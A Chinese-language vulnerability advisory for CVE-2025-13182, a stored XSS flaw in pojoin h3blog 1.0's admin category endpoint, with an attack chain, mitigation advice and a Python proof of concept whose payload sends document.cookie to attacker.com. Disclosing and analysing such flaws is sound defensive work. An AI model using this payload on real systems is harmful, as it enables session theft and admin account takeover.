CVE-2025-13182 CVSS 3.5 低危

CVE-2025-13182 | pojoin h3blog 1.0 跨站脚本(XSS)漏洞

披露日期: 2025-11-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13182

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

pojoin h3blog 1.0

漏洞概述

CVE-2025-13182是pojoin h3blog 1.0版本中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞位于管理后台的分类添加功能中，具体路径为/admin/cms/category/addtitle。攻击者可以通过构造恶意的Title参数值，在系统中注入任意JavaScript代码。由于该漏洞位于管理后台，攻击者一旦成功利用，可窃取管理员会话cookie、劫持管理员账户，甚至进一步渗透系统。由于CVSS评分仅为3.5，属于低危漏洞，但其利用可能对系统安全性造成一定影响。漏洞已于2025年11月14日披露，目前公开已有相关利用代码。

技术细节

该漏洞为存储型XSS，存在于/admin/cms/category/addtitle接口的Title参数中。攻击者向该接口提交包含恶意JavaScript代码的Title值时，由于后端未对用户输入进行充分的HTML转义或过滤，恶意代码会被存储在数据库中。当其他管理员或用户访问分类列表页面时，浏览器会解析并执行这段恶意脚本。攻击者可利用此漏洞窃取受害者的认证令牌、进行钓鱼攻击或修改页面内容。由于攻击目标为管理后台，攻击者获得管理员权限后可进一步控制整个CMS系统。漏洞的CVSS向量显示攻击复杂度低，但需要低权限用户和用户交互才能触发。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的管理后台登录页面

STEP 2

步骤2

使用低权限账户登录管理后台（需要PR:L权限）

STEP 3

步骤3

构造恶意XSS payload并提交到/admin/cms/category/addtitle接口的Title参数

STEP 4

步骤4

恶意脚本被存储在数据库中，当其他用户访问分类页面时触发

STEP 5

步骤5

攻击者窃取受害者Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13182 PoC - XSS in pojoin h3blog 1.0
# Target: /admin/cms/category/addtitle
# Parameter: Title

url = "http://target.com/admin/cms/category/addtitle"

# XSS payload - Cookie stealing example
payload = {
    "Title": "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>",
    # Add other required parameters
}

# If authentication is required, include session cookies
cookies = {
    "session": "admin_session_here"
}

# Send the malicious request
response = requests.post(url, data=payload, cookies=cookies)

print("XSS payload sent. Payload stored in database.")
print("When admin visits category list, cookie will be stolen.")

影响范围

pojoin h3blog 1.0

防御指南

临时缓解措施

在用户输入进入数据库前进行严格的输入验证和HTML转义，使用htmlspecialchars()或类似函数对特殊字符进行编码。同时配置Content-Security-Policy头部限制脚本执行，并对管理后台启用额外的安全认证机制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13182
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13182
3 Details https://www.cvedetails.com/cve/CVE-2025-13182/
4 VulDB https://vuldb.com/cve/CVE-2025-13182
5 Link https://github.com/caigo8/CVE-md/blob/main/h3blog/xss3.md
6 Link https://github.com/caigo8/CVE-md/blob/main/h3blog/xss3.md#vulnerability-reproduction
7 Link https://vuldb.com/?ctiid.332472
8 Link https://vuldb.com/?id.332472
9 Link https://vuldb.com/?submit.685520

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表